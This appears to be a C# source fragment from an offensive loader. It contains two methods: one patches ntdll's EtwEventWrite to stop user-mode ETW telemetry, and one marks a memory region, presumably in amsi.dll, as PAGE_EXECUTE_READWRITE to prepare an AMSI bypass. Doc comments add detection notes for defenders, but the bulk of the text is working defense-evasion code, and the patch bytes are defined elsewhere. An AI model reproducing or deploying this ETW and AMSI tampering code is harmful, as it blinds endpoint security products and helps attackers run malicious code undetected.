    /// <summary>
    /// Overwrites the start of ntdll!EtwEventWrite in the current process with the
    /// bytes returned by <c>getETWPayload()</c>, so user-mode ETW events emitted by
    /// this process are no longer written. This is a telemetry-blinding technique:
    /// security products that rely on in-process user-mode ETW providers lose
    /// visibility of this process, while kernel-side ETW providers are unaffected.
    /// </summary>
    /// <remarks>
    /// Detection-relevant observations (for defenders reviewing this sample):
    /// the sequence resolves VirtualProtect and an ntdll export by name, changes a
    /// page inside ntdll's mapped image to PAGE_EXECUTE_READWRITE (0x40), and writes
    /// into it; the original protection held in <c>oldProtect</c> is never restored,
    /// so a modified EtwEventWrite prologue and an RWX page in ntdll remain as
    /// in-memory artifacts that integrity checks and memory scanners can flag.
    /// <c>GetLibraryAddress</c> and <c>getETWPayload</c> are defined elsewhere in the
    /// file; the patch contents are not visible here. On VirtualProtect failure the
    /// method returns silently without reporting it.
    /// </remarks>
    private static void PatchETW()
    {
        // Resolve the export to be patched and the API used to make it writable.
        IntPtr pEtwEventSend   = GetLibraryAddress("ntdll.dll", "EtwEventWrite");
        IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect");

        // Call VirtualProtect through a delegate built from the resolved pointer
        // rather than a static P/Invoke declaration.
        VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect));

        var  patch = getETWPayload();
        uint oldProtect;

        // 0x40 == PAGE_EXECUTE_READWRITE. Only patch.Length bytes at the function's
        // entry are affected; oldProtect receives the previous protection but is
        // not used afterwards.
        if (fVirtualProtect(pEtwEventSend, (UIntPtr)patch.Length, 0x40, out oldProtect))
        {
            // Overwrite the function prologue in place.
            Marshal.Copy(patch, 0, pEtwEventSend, patch.Length);
            Console.WriteLine("[+] Successfully unhooked ETW!");
        }
    }
    /// <summary>
    /// Changes the memory protection at <paramref name="amsiLibPtr"/> to
    /// PAGE_EXECUTE_READWRITE (0x40) for as many bytes as <c>getAMSIPayload()</c>
    /// returns, preparing that region to be overwritten. Together with the payload
    /// helper this is the setup step of an in-memory AMSI tampering technique, which
    /// removes the script/assembly scanning that AMSI-aware security products perform
    /// in this process.
    /// </summary>
    /// <param name="amsiLibPtr">
    /// Address whose protection is changed; presumably a location inside the loaded
    /// amsi.dll (the name suggests so, but the caller is not visible here).
    /// </param>
    /// <returns>
    /// <paramref name="amsiLibPtr"/> unchanged when VirtualProtect succeeds;
    /// <c>(IntPtr)0</c> when it fails. Callers must compare against zero before
    /// writing through the returned pointer.
    /// </returns>
    /// <remarks>
    /// Detection-relevant observations: a protection change to RWX on a page of a
    /// loaded system DLL, requested through a dynamically resolved VirtualProtect, is
    /// the observable event here. The previous protection is captured in
    /// <c>newMemSpaceProtection</c> but never restored by this method.
    /// <c>GetLibraryAddress</c>, <c>getAMSIPayload</c> and the <c>VirtualProtect</c>
    /// delegate type are defined elsewhere in the file.
    /// </remarks>
    private static IntPtr unProtect(IntPtr amsiLibPtr)
    {
        // VirtualProtect is resolved by name at runtime and invoked via a delegate.
        IntPtr pVirtualProtect = GetLibraryAddress("kernel32.dll", "VirtualProtect");

        VirtualProtect fVirtualProtect = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(pVirtualProtect, typeof(VirtualProtect));

        // Receives the old protection value; despite its name it is not a new
        // protection and is not used after the call.
        uint newMemSpaceProtection = 0;

        // Region size is taken from the payload length; 0x40 == PAGE_EXECUTE_READWRITE.
        if (fVirtualProtect(amsiLibPtr, (UIntPtr)getAMSIPayload().Length, 0x40, out newMemSpaceProtection))
        {
            return(amsiLibPtr);
        }
        else
        {
            // Zero signals failure; equivalent to IntPtr.Zero.
            return((IntPtr)0);
        }
    }